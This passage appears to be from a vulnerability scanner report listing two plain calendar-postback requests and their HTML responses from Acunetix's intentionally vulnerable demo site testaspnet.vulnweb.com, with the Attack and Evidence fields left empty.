href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8124&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAzTvgEdoIZGRkWAZUlcoCMaUIG0LLAX12zzjeZMQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLF2%2F%2BNCwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIrIALHaTOXTMpez5kIz0fywwuYg
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:37 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAzTvgEdoIZGRkWAZUlcoCMaUIG0LLAX12zzjeZMQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLF2/+NCwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIrIALHaTOXTMpez5kIz0fywwuYg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:White" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8127&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCACrs7FNoIZGRkrx3c3l9R1w2%2FJ%2FFMb6JEoWr%2FVsQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLf5tilBwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDLSy5DCx1Oirp9rKfTFaCUO2Hj7C
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:00 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgCACrs7FNoIZGRkrx3c3l9R1w2/J/FMb6JEoWr/VsQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLf5tilBwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDLSy5DCx1Oirp9rKfTFaCUO2Hj7C" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:White" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS 